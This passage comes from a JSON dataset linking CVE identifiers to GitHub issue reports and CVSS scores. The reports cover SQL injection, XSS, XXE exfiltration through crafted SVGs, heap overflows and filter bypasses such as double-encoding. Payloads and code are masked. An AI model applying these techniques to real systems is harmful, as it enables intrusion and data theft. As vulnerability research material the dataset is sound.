  67305. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/18679",
  67306. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/18679",
  67307. "Repo_new": "radareorg/radare2",
  67308. "Issue_Created_At": "2021-05-11T12:22:26Z",
  67309. "description": "Heap memory bugs on pyc parse. Environment ERRORTAG Description APITAG While I am fuzzing rabin2 with I parameter, I am encountered several heap memory bugs with the same file on different sanitizers. I assume that if nested pyc magic byte NUMBERTAG is occured in file, radare2 tries to parse and does memory operations more than once and heap memory bugs are triggered. While ASAN throws heap use after free error on r_bin_object_set_items, MSAN and vanilla run throws double free error. This will lead seperate bugs both on r_bin_filter_name and r_bin_object_set_items . With ASAN: ERRORTAG With MSAN: ERRORTAG Without sanitizer: ERRORTAG Although, When I will test it with nested NUMBERTAG with no following bytes, It runs normally. ERRORTAG FILETAG It is failing with additional bytes after nested magic byte. FILETAG Test APITAG You can find files mentioned above in this zip file. FILETAG",
  67310. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67311. "severity": "MEDIUM",
  67312. "baseScore": 5.5,
  67313. "impactScore": 3.6,
  67314. "exploitabilityScore": 1.8
  67315. },
  67316. {
  67317. "CVE_ID": "CVE-2021-32615",
  67318. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1410",
  67319. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1410",
  67320. "Repo_new": "piwigo/piwigo",
  67321. "Issue_Created_At": "2021-05-13T10:37:45Z",
  67322. "description": "NUMBERTAG user manager] SQL injection. As reported by Harry Goodman from NCC Group: > The \u2018order NUMBERTAG dir]\u2019 parameter in FILETAG is vulnerable to SQL injection > > I believe this is because of the following pieces of code: CODETAG > I would suggest either using the check_inputs function that your application seems to rely on, or depending on how much functionality is needed, just do a check to ensure the parameter is either ASC or DESC. > > CVETAG",
  67323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67324. "severity": "CRITICAL",
  67325. "baseScore": 9.8,
  67326. "impactScore": 5.9,
  67327. "exploitabilityScore": 3.9
  67328. },
  67329. {
  67330. "CVE_ID": "CVE-2021-32618",
  67331. "Issue_Url_old": "https://github.com/Flask-Middleware/flask-security/issues/486",
  67332. "Issue_Url_new": "https://github.com/flask-middleware/flask-security/issues/486",
  67333. "Repo_new": "flask-middleware/flask-security",
  67334. "Issue_Created_At": "2021-05-17T01:18:29Z",
  67335. "description": "Open Redirect Vulnerability. It has been reported that FS (all versions) have an open redirect vulnerabilty. This is due to a combination of FS not doing complete checking of whether a redirect URL is relative or absolute, and modern browsers willing to 'fill in the blanks' for slightly malformed URLs. Thus a URL of the form: FILETAG will cause many browsers to redirect to github.com after a successful login to your app. However by default, Werkzeug auto corrects Location headers to always be absolute so this vulnerability doesn't exist for many (most?) applications.",
  67336. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67337. "severity": "MEDIUM",
  67338. "baseScore": 6.1,
  67339. "impactScore": 2.7,
  67340. "exploitabilityScore": 2.8
  67341. },
  67342. {
  67343. "CVE_ID": "CVE-2021-32630",
  67344. "Issue_Url_old": "https://github.com/Admidio/admidio/issues/994",
  67345. "Issue_Url_new": "https://github.com/admidio/admidio/issues/994",
  67346. "Repo_new": "admidio/admidio",
  67347. "Issue_Created_At": "2021-01-23T18:35:40Z",
  67348. "description": "Authenticated local file inclusion possible. Authenticated Local File Inclusion. Need admin or upload permissions. Someone with upload permissions can use the move to db ability to \"get\" local files and move to the Documents & Folders view. The mitigation to block \"/\" from file names works, but if you double encode it, it bypasses the check...",
  67349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  67350. "severity": "HIGH",
  67351. "baseScore": 8.8,
  67352. "impactScore": 5.9,
  67353. "exploitabilityScore": 2.8
  67354. },
  67355. {
  67356. "CVE_ID": "CVE-2021-3264",
  67357. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/6",
  67358. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/6",
  67359. "Repo_new": "cbkhwx/cxuucmsv3",
  67360. "Issue_Created_At": "2021-01-20T03:02:50Z",
  67361. "description": "SQL injection vulnerability exists in FILETAG file. An SQL injection vulnerability exists in the front end FILETAG page You need to log in to admin before SQL injection. exp1: URLTAG Verify screenshot FILETAG exp2: URLTAG Verify screenshot FILETAG",
  67362. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  67363. "severity": "HIGH",
  67364. "baseScore": 7.2,
  67365. "impactScore": 5.9,
  67366. "exploitabilityScore": 1.2
  67367. },
  67368. {
  67369. "CVE_ID": "CVE-2021-32640",
  67370. "Issue_Url_old": "https://github.com/websockets/ws/issues/1895",
  67371. "Issue_Url_new": "https://github.com/websockets/ws/issues/1895",
  67372. "Repo_new": "websockets/ws",
  67373. "Issue_Created_At": "2021-06-01T15:04:05Z",
  67374. "description": "Backport Security Fix to NUMBERTAG APITAG [x] I've searched for any related issues and avoided creating a duplicate issue. Description Any chances the security fix patch URLTAG could be backported to NUMBERTAG to release a NUMBERTAG with the fix? Webpack dev server currently uses NUMBERTAG which has caused a flagged security issue in a lot of repos that can't be fixed until people can upgrade to the not yet stable webpack dev server NUMBERTAG URLTAG APITAG we are using webpack dev server as a dependency of react scrips so it will probably be a long time before react scripts updates to webpack dev server NUMBERTAG Admittedly being a dev server, this is (hopefully) only local, but it would be nice not to have a security alert stuck on our github repository. Reproducible in: version NUMBERTAG FILETAG version(s): OS version(s): Steps to reproduce NUMBERTAG Install webpack dev server Expected result: No security issue Actual result: Flagged security issues",
  67375. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  67376. "severity": "MEDIUM",
  67377. "baseScore": 5.3,
  67378. "impactScore": 1.4,
  67379. "exploitabilityScore": 3.9
  67380. },
  67381. {
  67382. "CVE_ID": "CVE-2021-32670",
  67383. "Issue_Url_old": "https://github.com/simonw/datasette/issues/1360",
  67384. "Issue_Url_new": "https://github.com/simonw/datasette/issues/1360",
  67385. "Repo_new": "simonw/datasette",
  67386. "Issue_Created_At": "2021-06-05T21:53:51Z",
  67387. "description": "Security flaw, to be fixed in NUMBERTAG and NUMBERTAG Details to follow after the patch has been released.",
  67388. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67389. "severity": "MEDIUM",
  67390. "baseScore": 6.1,
  67391. "impactScore": 2.7,
  67392. "exploitabilityScore": 2.8
  67393. },
  67394. {
  67395. "CVE_ID": "CVE-2021-3272",
  67396. "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/259",
  67397. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/259",
  67398. "Repo_new": "jasper-software/jasper",
  67399. "Issue_Created_At": "2021-01-06T05:48:40Z",
  67400. "description": "Heap buffer overflow in PATHTAG I found a heap buffer overflow vulnerability in the current master branch (release version NUMBERTAG poc file : FILETAG ASAN report \u279c appl git:(master) \u2717 ./jasper input PATHTAG output test.jp2 warning: not enough tile data NUMBERTAG bytes) warning: bad segmentation symbol warning: bad segmentation symbol warning: bad segmentation symbol warning: bad segmentation symbol warning: component data type mismatch APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f8 at pc NUMBERTAG f NUMBERTAG ad NUMBERTAG be bp NUMBERTAG fffbeaa2a NUMBERTAG sp NUMBERTAG fffbeaa2a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f8 thread T NUMBERTAG f NUMBERTAG ad NUMBERTAG bd in jp2_decode PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG in jas_image_decode PATHTAG NUMBERTAG f8d NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG bde NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG f8 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG c NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG c8 in jas_malloc PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in jp2_decode Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fd fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  67401. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67402. "severity": "MEDIUM",
  67403. "baseScore": 5.5,
  67404. "impactScore": 3.6,
  67405. "exploitabilityScore": 1.8
  67406. },
  67407. {
  67408. "CVE_ID": "CVE-2021-32823",
  67409. "Issue_Url_old": "https://github.com/rubysec/ruby-advisory-db/issues/476",
  67410. "Issue_Url_new": "https://github.com/rubysec/ruby-advisory-db/issues/476",
  67411. "Repo_new": "rubysec/ruby-advisory-db",
  67412. "Issue_Created_At": "2021-06-01T21:41:34Z",
  67413. "description": "Add advisory for bindata. Potential APITAG which was fixed in URLTAG as part of bindata NUMBERTAG No CVE yet",
  67414. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
  67415. "severity": "LOW",
  67416. "baseScore": 3.7,
  67417. "impactScore": 1.4,
  67418. "exploitabilityScore": 2.2
  67419. },
  67420. {
  67421. "CVE_ID": "CVE-2021-32838",
  67422. "Issue_Url_old": "https://github.com/python-restx/flask-restx/issues/372",
  67423. "Issue_Url_new": "https://github.com/python-restx/flask-restx/issues/372",
  67424. "Repo_new": "python-restx/flask-restx",
  67425. "Issue_Created_At": "2021-08-31T17:26:29Z",
  67426. "description": "GHSL NUMBERTAG Hello, The FILETAG has found a potential vulnerability in your project. Please create a Security Advisory URLTAG and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a Security Policy URLTAG containing a security email address to send the details to. If you prefer to contact us by email, please reach out to EMAILTAG with reference to GHSL NUMBERTAG Thank you, Kevin Backhouse APITAG Security Lab",
  67427. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  67428. "severity": "HIGH",
  67429. "baseScore": 7.5,
  67430. "impactScore": 3.6,
  67431. "exploitabilityScore": 3.9
  67432. },
  67433. {
  67434. "CVE_ID": "CVE-2021-32849",
  67435. "Issue_Url_old": "https://github.com/Gerapy/Gerapy/issues/197",
  67436. "Issue_Url_new": "https://github.com/gerapy/gerapy/issues/197",
  67437. "Repo_new": "gerapy/gerapy",
  67438. "Issue_Created_At": "2021-05-14T12:11:59Z",
  67439. "description": "APITAG Security Lab: Security Contact Needed. Hello, The FILETAG has found a potential vulnerability in your project. Please create a Security Advisory URLTAG and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a Security Policy URLTAG containing a security email address to send the details to. If you prefer to contact us by email, please reach out to EMAILTAG with reference to APITAG . Thank you, Agustin Gianni APITAG Security Lab",
  67440. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  67441. "severity": "HIGH",
  67442. "baseScore": 8.8,
  67443. "impactScore": 5.9,
  67444. "exploitabilityScore": 2.8
  67445. },
  67446. {
  67447. "CVE_ID": "CVE-2021-32849",
  67448. "Issue_Url_old": "https://github.com/Gerapy/Gerapy/issues/217",
  67449. "Issue_Url_new": "https://github.com/gerapy/gerapy/issues/217",
  67450. "Repo_new": "gerapy/gerapy",
  67451. "Issue_Created_At": "2021-11-22T09:05:04Z",
  67452. "description": "Security Issue: GHSL NUMBERTAG gerapy. The APITAG Security Lab reported a potential security vulnerability (GHSL NUMBERTAG gerapy) in your project on PATHTAG It has been NUMBERTAG days since our initial report and as per our coordinated disclosure policy, we intend to publish a public advisory detailing this issue. If you do wish to further coordinate a response to this issue with the APITAG Security Lab, please contact us at EMAILTAG within the next NUMBERTAG days in reference to GHSL NUMBERTAG gerapy and we would love to help you resolve these issues. If not, feel free to close this issue after which we will proceed with advisory publication.",
  67453. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  67454. "severity": "HIGH",
  67455. "baseScore": 8.8,
  67456. "impactScore": 5.9,
  67457. "exploitabilityScore": 2.8
  67458. },
  67459. {
  67460. "CVE_ID": "CVE-2021-3286",
  67461. "Issue_Url_old": "https://github.com/spotweb/spotweb/issues/653",
  67462. "Issue_Url_new": "https://github.com/spotweb/spotweb/issues/653",
  67463. "Repo_new": "spotweb/spotweb",
  67464. "Issue_Created_At": "2021-01-21T18:18:48Z",
  67465. "description": "SQL injection imcomplete fix. Describe the bug/issue Hi, I'm part of the Debian LTS Team and I'm investigating CVETAG , reported under NUMBERTAG describes an SQL injection. The fix from APITAG / APITAG introduces a black list and a regex to attempt to filter out the malicious payload. The fix is incomplete and a variation of the example payload escapes the black list. Have you searched the internet or Github for an answer? Yes. To Reproduce Follow NUMBERTAG and replace e.g. \"SELECT NUMBERTAG FROM\" with \"SELECT NUMBERTAG FROM\". Expected behavior User input escaped in SQL query. Desktop OS: Debian APITAG Spotweb Develop PHP NUMBERTAG Additional context Using a blacklist filter is not recommended in this scenario, because APITAG queries can be written in varied and unexpected ways, see e.g.: CVETAG FILETAG which recommends parametrization and white lists, among other solutions. The procedure is to request a new CVE identifier when an vulnerability was previously considered fixed. I plan to do that, unless you tell me not to before the end of the week.",
  67466. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67467. "severity": "CRITICAL",
  67468. "baseScore": 9.8,
  67469. "impactScore": 5.9,
  67470. "exploitabilityScore": 3.9
  67471. },
  67472. {
  67473. "CVE_ID": "CVE-2021-3293",
  67474. "Issue_Url_old": "https://github.com/emlog/emlog/issues/62",
  67475. "Issue_Url_new": "https://github.com/emlog/emlog/issues/62",
  67476. "Repo_new": "emlog/emlog",
  67477. "Issue_Created_At": "2021-01-23T20:32:29Z",
  67478. "description": "emlog NUMBERTAG has Full Path Disclosure vulnerability. emlog NUMBERTAG has Full Path Disclosure vulnerability emlog is a fast, stable and easy to use blog and CMS website building system based on PHP and APITAG site: FILETAG vulnerability in FILETAG line NUMBERTAG APITAG that uses a method of requesting a page like this: APITAG We can use a method of opening and closing braces that causes the page to output an error. This method would look like this: APITAG This renders the page defunct thus spitting out an error: APITAG POC: APITAG Full Path Disclosure vulnerabilities enable the attacker to see the path to the webroot/file. Certain vulnerabilities, such as using the APITAG (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. Examples: CODETAG",
  67479. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  67480. "severity": "MEDIUM",
  67481. "baseScore": 5.3,
  67482. "impactScore": 1.4,
  67483. "exploitabilityScore": 3.9
  67484. },
  67485. {
  67486. "CVE_ID": "CVE-2021-33041",
  67487. "Issue_Url_old": "https://github.com/yoshuawuyts/vmd/issues/137",
  67488. "Issue_Url_new": "https://github.com/yoshuawuyts/vmd/issues/137",
  67489. "Repo_new": "yoshuawuyts/vmd",
  67490. "Issue_Created_At": "2021-05-17T08:58:43Z",
  67491. "description": "Cross Site Scripting vulnerability. Hi, I'd like to report a security vulnerability in the latest release : Description: Cross site scripting (XSS) vulnerability(also execute constructed malicious code) Date: APITAG Version NUMBERTAG APITAG Tested on: Windows NUMBERTAG Mac POC The program does not properly handle the content of the code, causing the program to have a cross site scripting vulnerability, which can also execute constructed malicious code NUMBERTAG create FILETAG file with the following content: ERRORTAG NUMBERTAG use FILETAG to open the FILETAG ,the poc code is executed NUMBERTAG pop up FILETAG XSS the file content code : ERRORTAG APITAG Execute malicious code the file content code : APITAG use FILETAG open FILETAG file to execute malicious code with xss vulnerability: APITAG when FILETAG open the FILETAG file , the poc code parsed in FILETAG APITAG , so it executed: APITAG Use the Poc APITAG on Mac: FILETAG How to fi NUMBERTAG Use an appropriate escaping/encoding technique depending on where user input is to be used: HTML escape, APITAG escape, CSS escape, URL escape, etc NUMBERTAG MD should sanitize the content in order to avoid XSS.",
  67492. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67493. "severity": "MEDIUM",
  67494. "baseScore": 6.1,
  67495. "impactScore": 2.7,
  67496. "exploitabilityScore": 2.8
  67497. },
  67498. {
  67499. "CVE_ID": "CVE-2021-3309",
  67500. "Issue_Url_old": "https://github.com/wekan/wekan/issues/3482",
  67501. "Issue_Url_new": "https://github.com/wekan/wekan/issues/3482",
  67502. "Repo_new": "wekan/wekan",
  67503. "Issue_Created_At": "2021-01-25T22:42:05Z",
  67504. "description": "Security: SSL/TLS certificate validation for LDAP disabled by default. As of writing, Wekan disables the SSL/TLS certificate validation for LDAP by default unless ERRORTAG URLTAG is explicitly set. Thus, by default, Wekan is effectively vulnerable to MITM attacks, even when using SSL/TLS for LDAP. I treat this default behaviour as bad, given that security shouldn't be opt in but opt out (e.g. for test only environments). As this behaviour does not seem to be properly documented for system administrators (at least not outside of the source code), I would treat this as a vulnerability following FILETAG and thus as a CVE worthy candidate. Oh, and please note that FILETAG itself has, according to its FILETAG , a security wise default by having true as default for ERRORTAG .",
  67505. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67506. "severity": "HIGH",
  67507. "baseScore": 8.1,
  67508. "impactScore": 5.9,
  67509. "exploitabilityScore": 2.2
  67510. },
  67511. {
  67512. "CVE_ID": "CVE-2021-3312",
  67513. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/725",
  67514. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/725",
  67515. "Repo_new": "alkacon/opencms-core",
  67516. "Issue_Created_At": "2021-10-07T08:28:02Z",
  67517. "description": "XXE vulnerability allows exfiltration of data from the server file system by uploading a crafted SVG. In APITAG NUMBERTAG it is possible for logged in users with edit permissions to exfiltrate data from the server's file system and send it to an external server by uploading specially crafted SVGs files. Example in which the first line of /etc/issue is read and sent to the server APITAG The SVG file to upload: CODETAG The FILETAG file served by the external server APITAG APITAG CVE ID: CVETAG .",
  67518. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  67519. "severity": "MEDIUM",
  67520. "baseScore": 6.5,
  67521. "impactScore": 3.6,
  67522. "exploitabilityScore": 2.8
  67523. },
  67524. {
  67525. "CVE_ID": "CVE-2021-3312",
  67526. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/721",
  67527. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/721",
  67528. "Repo_new": "alkacon/opencms-core",
  67529. "Issue_Created_At": "2021-09-30T16:06:30Z",
  67530. "description": "APITAG NUMBERTAG Security Vulnerability. Hello, I'm Riccardo Iesari from NTT Data Italia, during an assessment for a client we discovered a security vulnerability in APITAG NUMBERTAG The issue concerns an unrestricted file upload, this leads to several other vulnerabilities varying from stored XSS to RCE APITAG Command Execution). The exploit of this vulnerability allows a malicious user to directly attack the server where the CMS is running, expanding the attack surface. Below are some references from OWASP regarding the vulnerabilities found: URLTAG URLTAG We would like to know how to correctly report to you this vulnerability, feel free to contact us at riccardo. EMAILTAG . Best regards, Riccardo Iesari.",
  67531. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  67532. "severity": "MEDIUM",
  67533. "baseScore": 6.5,
  67534. "impactScore": 3.6,
  67535. "exploitabilityScore": 2.8
  67536. },
  67537. {
  67538. "CVE_ID": "CVE-2021-3318",
  67539. "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/173",
  67540. "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/173",
  67541. "Repo_new": "zyx0814/dzzoffice",
  67542. "Issue_Created_At": "2021-01-27T12:58:49Z",
  67543. "description": "Potential XSS Vulnerability. There is a potential XSS vulnerability in PATHTAG using the 'editorid' parameter.",
  67544. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67545. "severity": "MEDIUM",
  67546. "baseScore": 6.1,
  67547. "impactScore": 2.7,
  67548. "exploitabilityScore": 2.8
  67549. },
  67550. {
  67551. "CVE_ID": "CVE-2021-33185",
  67552. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/7073",
  67553. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/7073",
  67554. "Repo_new": "serenityos/serenity",
  67555. "Issue_Created_At": "2021-05-13T07:29:03Z",
  67556. "description": "Tests: APITAG has heap buffer overflow in set_range test. The set_range test in APITAG overflows the allocated bitmap in APITAG CODETAG APITAG APITAG Test run with ASAN backtrace APITAG ERRORTAG APITAG",
  67557. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  67558. "severity": "HIGH",
  67559. "baseScore": 7.5,
  67560. "impactScore": 3.6,
  67561. "exploitabilityScore": 3.9
  67562. },
  67563. {
  67564. "CVE_ID": "CVE-2021-33186",
  67565. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/7072",
  67566. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/7072",
  67567. "Repo_new": "serenityos/serenity",
  67568. "Issue_Created_At": "2021-05-13T07:24:04Z",
  67569. "description": "Tests: test crypto has stack buffer overflow when AES encrypting NUMBERTAG octets. This test causes a stack buffer overflow in the in array of NUMBERTAG bytes: CODETAG APITAG APITAG Test run details with ASAN backtrace APITAG ERRORTAG APITAG",
  67570. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  67571. "severity": "HIGH",
  67572. "baseScore": 7.5,
  67573. "impactScore": 3.6,
  67574. "exploitabilityScore": 3.9
  67575. },
  67576. {
  67577. "CVE_ID": "CVE-2021-3325",
  67578. "Issue_Url_old": "https://github.com/mikaku/Monitorix/issues/309",
  67579. "Issue_Url_new": "https://github.com/mikaku/monitorix/issues/309",
  67580. "Repo_new": "mikaku/monitorix",
  67581. "Issue_Created_At": "2021-01-26T03:36:09Z",
  67582. "description": "Not asking for password and can't connect to psql. Hi. I followed this tutorial URLTAG After setting up everything I found that when I go to the built-in server it never asks for a password even though I set it. I did change APITAG and also created the password using APITAG Then I tried setting up postgres by enabling the graph and changing the database name, user and password which led to me having to install the DBD::Pg module. After all this I checked the logs and it shows: ERRORTAG ERRORTAG Thanks Nuno",
  67583. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67584. "severity": "CRITICAL",
  67585. "baseScore": 9.8,
  67586. "impactScore": 5.9,
  67587. "exploitabilityScore": 3.9
  67588. },
  67589. {
  67590. "CVE_ID": "CVE-2021-33347",
  67591. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/152",
  67592. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/152",
  67593. "Repo_new": "jpressprojects/jpress",
  67594. "Issue_Created_At": "2021-05-12T12:06:12Z",
  67595. "description": "There is a storage XSS vulnerability in the template module. There is a storage XSS vulnerability in the template module. The figure shows the setting interface of template management, which is used to describe the left part of the home page. URL: APITAG FILETAG However, if hackers enter the background by means of weak password and add XSS code, they can easily cause great harm: Hijacking cookies, obtaining sensitive information, phishing and so on.",
  67596. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  67597. "severity": "MEDIUM",
  67598. "baseScore": 5.4,
  67599. "impactScore": 2.7,
  67600. "exploitabilityScore": 2.3
  67601. },
  67602. {
  67603. "CVE_ID": "CVE-2021-33348",
  67604. "Issue_Url_old": "https://github.com/jfinal/jfinal/issues/188",
  67605. "Issue_Url_new": "https://github.com/jfinal/jfinal/issues/188",
  67606. "Repo_new": "jfinal/jfinal",
  67607. "Issue_Created_At": "2021-05-13T02:04:35Z",
  67608. "description": "There are XSS vulnerabilities in some cases. The main reason is that the controller does not filter the parameters during rendering, which leads to malicious input of users and may lead to XSS APITAG FILETAG I wrote a demo: Controller CODETAG FILETAG APITAG If the user's input is output directly, XSS will be caused after the controller's set method is set. If the malicious parameters of controller are taken from the database, XSS vulnerability will be stored Repair The APITAG should be judged before the set method calls APITAG . If it is in string format, the harmful characters should be filtered, such as APITAG CODETAG",
  67609. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67610. "severity": "MEDIUM",
  67611. "baseScore": 6.1,
  67612. "impactScore": 2.7,
  67613. "exploitabilityScore": 2.8
  67614. },
  67615. {
  67616. "CVE_ID": "CVE-2021-33361",
  67617. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1782",
  67618. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1782",
  67619. "Repo_new": "gpac/gpac",
  67620. "Issue_Created_At": "2021-05-08T05:12:31Z",
  67621. "description": "FILETAG",
  67622. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  67623. "severity": "MEDIUM",
  67624. "baseScore": 5.5,
  67625. "impactScore": 3.6,
  67626. "exploitabilityScore": 1.8
  67627. },
  67628. {
  67629. "CVE_ID": "CVE-2021-33362",
  67630. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1780",
  67631. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1780",
  67632. "Repo_new": "gpac/gpac",
  67633. "Issue_Created_At": "2021-05-08T05:09:01Z",
  67634. "description": "FILETAG",
  67635. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67636. "severity": "HIGH",
  67637. "baseScore": 7.8,
  67638. "impactScore": 5.9,
  67639. "exploitabilityScore": 1.8
  67640. },
  67641. {
  67642. "CVE_ID": "CVE-2021-33363",
  67643. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1786",
  67644. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1786",
  67645. "Repo_new": "gpac/gpac",
  67646. "Issue_Created_At": "2021-05-08T05:17:05Z",
  67647. "description": "FILETAG",
  67648. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  67649. "severity": "MEDIUM",
  67650. "baseScore": 5.5,
  67651. "impactScore": 3.6,
  67652. "exploitabilityScore": 1.8
  67653. },
  67654. {
  67655. "CVE_ID": "CVE-2021-33364",
  67656. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1783",
  67657. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1783",
  67658. "Repo_new": "gpac/gpac",
  67659. "Issue_Created_At": "2021-05-08T05:13:43Z",
  67660. "description": "FILETAG",
  67661. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  67662. "severity": "MEDIUM",
  67663. "baseScore": 5.5,
  67664. "impactScore": 3.6,
  67665. "exploitabilityScore": 1.8
  67666. },
  67667. {
  67668. "CVE_ID": "CVE-2021-33365",
  67669. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1784",
  67670. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1784",
  67671. "Repo_new": "gpac/gpac",
  67672. "Issue_Created_At": "2021-05-08T05:14:42Z",
  67673. "description": "FILETAG",
  67674. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  67675. "severity": "MEDIUM",
  67676. "baseScore": 5.5,
  67677. "impactScore": 3.6,
  67678. "exploitabilityScore": 1.8
  67679. },
  67680. {
  67681. "CVE_ID": "CVE-2021-3337",
  67682. "Issue_Url_old": "https://github.com/snlbaral/Hide-Thread-Content/issues/1",
  67683. "Issue_Url_new": "https://github.com/snlbaral/hide-thread-content/issues/1",
